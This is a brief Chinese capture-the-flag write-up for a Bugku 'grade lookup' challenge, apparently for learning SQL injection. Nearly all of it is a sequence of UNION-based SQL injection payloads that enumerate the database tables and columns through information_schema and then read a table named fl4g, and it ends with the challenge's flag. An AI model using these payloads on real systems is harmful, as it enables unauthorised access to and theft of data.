题目
成绩查询
题目链接
分析
可以知道这个题共4个数据
构建语句
'or 1=2 union select 1,2,3,4 #
查询表名
'or 1=2 union select group_concat(table_name),2,3,4 from information_schema.columns where table_schema=database()#
得到表名:fl4g
查询列名
'or 1=2 union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema=database()#
得到列名:skctf_flag
查询表fl4g
'or 1=2 union select skctf_flag,2,3,4 from fl4g#
得到flag:BUGKU{Sql_INJECT0N_4813drd8hz4}